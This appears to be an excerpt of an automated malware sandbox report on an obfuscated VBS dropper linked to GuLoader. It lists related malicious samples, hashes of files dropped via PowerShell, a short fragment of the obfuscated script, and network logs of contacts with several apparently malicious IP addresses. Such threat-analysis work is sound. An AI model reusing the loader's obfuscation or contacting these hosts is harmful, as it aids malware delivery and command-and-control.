• Salary List.vbs: GuLoader; context: 188.215.50.15
• Purchase Order No.P7696#U00faPDF.scr.exe: AgentTesla, PureLog Stealer
                                                • 188.215.50.15
                                                r____________PO240515001.exeGet hashmaliciousAgentTeslaBrowse
                                                • 188.215.50.15
                                                EnR0HIiSFf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 188.215.50.15
                                                Oferta de asociaci#U00f3n para nuestro proyecto de junio.exeGet hashmaliciousAgentTeslaBrowse
                                                • 188.215.50.15
                                                z2InvoiceConfirmation3.batGet hashmaliciousAgentTeslaBrowse
                                                • 188.215.50.15
                                                rAWB76209811980-8755785874087547656x44433-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 188.215.50.15
                                                z16INVOICE07.batGet hashmaliciousUnknownBrowse
                                                • 188.215.50.15
                                                37f463bf4616ecd445d4a1937da06e19SWIFT 103 202405291545524610 290524.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 188.215.50.15
                                                ORDER STBK05047.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • 188.215.50.15
                                                SecuriteInfo.com.Program.Unwanted.4662.20461.1147.exeGet hashmaliciousUnknownBrowse
                                                • 188.215.50.15
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 188.215.50.15
                                                SecuriteInfo.com.Win32.PWSX-gen.3407.10323.exeGet hashmaliciousCryptOne, VidarBrowse
                                                • 188.215.50.15
                                                SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 188.215.50.15
                                                0x001900000002ab40-59.exeGet hashmaliciousArc StealerBrowse
                                                • 188.215.50.15
                                                MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 188.215.50.15
                                                SecuriteInfo.com.Win32.DropperX-gen.2332.10313.exeGet hashmaliciousLummaCBrowse
                                                • 188.215.50.15
                                                temp2.vbsGet hashmaliciousGuLoaderBrowse
                                                • 188.215.50.15
                                                No context
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):11608
                                                Entropy (8bit):4.8908305915084105
                                                Encrypted:false
                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                Malicious:false
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                Malicious:false
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\clip.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                Category:modified
                                                Size (bytes):196608
                                                Entropy (8bit):1.1215420383712111
                                                Encrypted:false
                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                Malicious:false
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):421548
                                                Entropy (8bit):5.966651016215398
                                                Encrypted:false
                                                SSDEEP:12288:OxGg2qO4Yu6lxLXRoleGiQCRNkCcFdHaByI5tV:Z7qOomLaleSC6ZdHmLV
                                                MD5:E7042BA465F066F0444926875BF66170
                                                SHA1:230F14F3E1285A0B9FCD40546B423C36EC9DFD51
                                                SHA-256:A3E66BE0C9E53E8E5B70E8E652FF35F925A07D7DF33B40BCD54BA51B9CD29B5A
                                                SHA-512:DE3A4786F418A72BFB0F3F0C272E657C89B4B5A4A08483DF3664BEB243AD5F9B000928443314CC5FBD931120099954B8EF7F2DF0AC5A4A57529B8E5BE770B207
                                                Malicious:false
                                                File type:ASCII text
                                                Entropy (8bit):4.398131484241901
                                                TrID:
                                                • Visual Basic Script (13500/0) 100.00%
                                                File name:IMG-466573885783553Folketingsmedlemmers.vbs
                                                File size:23'175 bytes
                                                MD5:622f2e2a15eda9d46a0d8ad2d9c3438a
                                                SHA1:3c1f879724659f5274a96a9f5dd39c6ced286a4e
                                                SHA256:0566b9624b3a112acec15ffcc968bbe2543a632412ab1cceafa45bf946962038
                                                SHA512:b46f86213be6b56b064038b36cb0b3378065f8149f3aa9715abcadbeec816dc5a4e9f2006fc3038210d0b44aa0da1e62e29053f20bd676a42cf874c98fe280f3
                                                SSDEEP:192:Z7sDB23T/6sUDYJWuktIJajJumgl8tgOCW4oFML+PfelRJzNWnsP3tmCJJisJWcs:Z7s4lETVEbiqLWSxJXwZYRg5GiEC
                                                TLSH:ECA23075F46FA86BC0B303F96CC1EC4AB7FD625BE504A04A0AD988873DF544D92089D2
                                                File Content Preview:.. ......Function Benzantialdoxime(Farestierne)....Benzantialdoxime = ChrW(Farestierne)....End Function .... ..Skittling = 0.... ..Surfacing= array(71-1+0,69,77,59,72,73,62,59,66,66).... ....Ar6 = Standpatism .... ..Dim Brefrekvens.... ..for Distribut
                                                Icon Hash:68d69b8f86ab9a86
                                                Jun 1, 2024 19:57:43.675194025 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.675240993 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:43.675266981 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.675286055 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.675333977 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:43.675339937 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.675359011 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:43.675386906 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:43.676043034 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.676059961 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.676120043 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:43.676126957 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.676173925 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:43.676388979 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.676402092 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.676476955 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:43.676476955 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:43.676489115 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:43.676537991 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:44.039433956 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:44.039449930 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:44.039488077 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:44.039515972 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:44.039531946 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:44.039561987 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:44.039568901 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:44.039580107 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:44.039587021 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:44.039592981 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:44.039634943 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:44.039669037 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:44.039669037 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:44.039707899 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:44.042675972 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:16.741296053 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:16.741342068 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:16.742508888 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:16.820512056 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:16.820539951 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:17.703346014 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:17.703948975 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:17.756514072 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:17.756532907 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:17.756871939 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:17.757016897 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:17.760946035 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:17.808509111 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.038145065 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.038202047 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.177774906 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.177787066 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.177809954 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.177851915 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.177872896 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.177917004 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.177917004 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.324651003 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.324678898 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.324733019 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.324752092 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.324795008 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.324795008 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.325531960 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.325548887 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.325602055 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.325614929 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.325694084 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.470848083 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.470871925 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.470938921 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.470963001 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.471120119 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.620621920 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.620659113 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.620731115 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.620731115 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.620748997 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.620917082 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.620944023 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.621000051 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.621000051 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.621006012 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.621665955 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.622677088 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.622705936 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.622796059 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.622796059 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.622801065 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.624505043 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.762314081 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.762356997 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.762435913 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.762454033 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.762492895 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.762492895 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.763263941 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.763287067 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.763335943 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.763345957 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.763364077 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.764187098 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.764213085 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.764236927 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.764246941 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.764286041 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.764286041 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.764503002 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.908128977 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.908195019 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.908366919 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.908366919 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.908404112 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.908792019 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.908843994 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.908907890 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.908907890 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.908915997 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.909650087 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.909720898 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.909764051 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.909832001 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.909832001 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.909837961 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.910165071 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.910335064 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.910383940 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.910451889 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.910451889 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:18.910459042 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:18.914115906 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.054548979 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.054613113 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.054646015 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.054661036 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.054699898 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.054699898 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.054794073 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.054968119 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.055175066 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.055242062 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.055347919 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.055414915 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.055423975 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.055502892 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.055505037 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.055545092 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.055545092 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.055551052 CEST44349707188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:58:19.055579901 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:19.055594921 CEST49707443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:58:51.422774076 CEST4971080192.168.2.7137.220.252.40
                                                Jun 1, 2024 19:58:51.427690983 CEST8049710137.220.252.40192.168.2.7
                                                Jun 1, 2024 19:58:51.427803040 CEST4971080192.168.2.7137.220.252.40
                                                Jun 1, 2024 19:58:51.430025101 CEST4971080192.168.2.7137.220.252.40
                                                Jun 1, 2024 19:58:51.434914112 CEST8049710137.220.252.40192.168.2.7
                                                Jun 1, 2024 19:58:52.301407099 CEST8049710137.220.252.40192.168.2.7
                                                Jun 1, 2024 19:58:52.354068995 CEST4971080192.168.2.7137.220.252.40
                                                Jun 1, 2024 19:58:52.441245079 CEST8049710137.220.252.40192.168.2.7
                                                Jun 1, 2024 19:58:52.441435099 CEST4971080192.168.2.7137.220.252.40
                                                Jun 1, 2024 19:58:52.443346024 CEST4971080192.168.2.7137.220.252.40
                                                Jun 1, 2024 19:58:52.448141098 CEST8049710137.220.252.40192.168.2.7
                                                Jun 1, 2024 19:59:07.776550055 CEST4971180192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:07.781510115 CEST804971137.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:07.781641006 CEST4971180192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:07.784511089 CEST4971180192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:07.789484024 CEST804971137.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:08.636246920 CEST804971137.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:08.682329893 CEST4971180192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:08.769567966 CEST804971137.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:08.769692898 CEST4971180192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:09.291723013 CEST4971180192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:10.310241938 CEST4971280192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:10.315181017 CEST804971237.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:10.315274000 CEST4971280192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:10.316728115 CEST4971280192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:10.321564913 CEST804971237.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:11.168515921 CEST804971237.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:11.213483095 CEST4971280192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:11.299321890 CEST804971237.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:11.299432039 CEST4971280192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:11.823239088 CEST4971280192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:12.841881990 CEST4971380192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:12.846927881 CEST804971337.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:12.847008944 CEST4971380192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:12.849035978 CEST4971380192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:12.853996038 CEST804971337.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:12.854015112 CEST804971337.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:13.685551882 CEST804971337.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:13.729124069 CEST4971380192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:13.813735008 CEST804971337.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:13.813802958 CEST4971380192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:14.354429960 CEST4971380192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:15.372931957 CEST4971480192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:15.463301897 CEST804971437.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:15.463419914 CEST4971480192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:15.465473890 CEST4971480192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:15.470345020 CEST804971437.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:16.317831993 CEST804971437.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:16.369932890 CEST4971480192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:16.448409081 CEST804971437.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:16.448580980 CEST4971480192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:16.450959921 CEST4971480192.168.2.737.235.104.9
                                                Jun 1, 2024 19:59:16.455792904 CEST804971437.235.104.9192.168.2.7
                                                Jun 1, 2024 19:59:37.699455976 CEST4971580192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:37.704390049 CEST8049715193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:37.704497099 CEST4971580192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:37.706533909 CEST4971580192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:37.711447001 CEST8049715193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:38.528461933 CEST8049715193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:38.572983980 CEST4971580192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:38.645246983 CEST8049715193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:38.645317078 CEST4971580192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:39.213954926 CEST4971580192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:40.232701063 CEST4971680192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:40.237627983 CEST8049716193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:40.237754107 CEST4971680192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:40.239559889 CEST4971680192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:40.244494915 CEST8049716193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:41.053061008 CEST8049716193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:41.104505062 CEST4971680192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:41.169434071 CEST8049716193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:41.173512936 CEST4971680192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:41.747380018 CEST4971680192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:42.763469934 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:42.768488884 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:42.768644094 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:42.770765066 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:42.775695086 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:42.777395964 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:43.597502947 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:43.652518034 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:43.714338064 CEST8049717193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:43.714829922 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:44.276547909 CEST4971780192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:45.294523001 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:45.299768925 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:45.299910069 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:45.301719904 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:45.306653023 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.116954088 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.116990089 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.117163897 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:46.120230913 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.166703939 CEST4971880192.168.2.7193.37.145.73
                                                Jun 1, 2024 19:59:46.236881971 CEST8049718193.37.145.73192.168.2.7
                                                Jun 1, 2024 19:59:46.237010956 CEST4971880192.168.2.7193.37.145.73
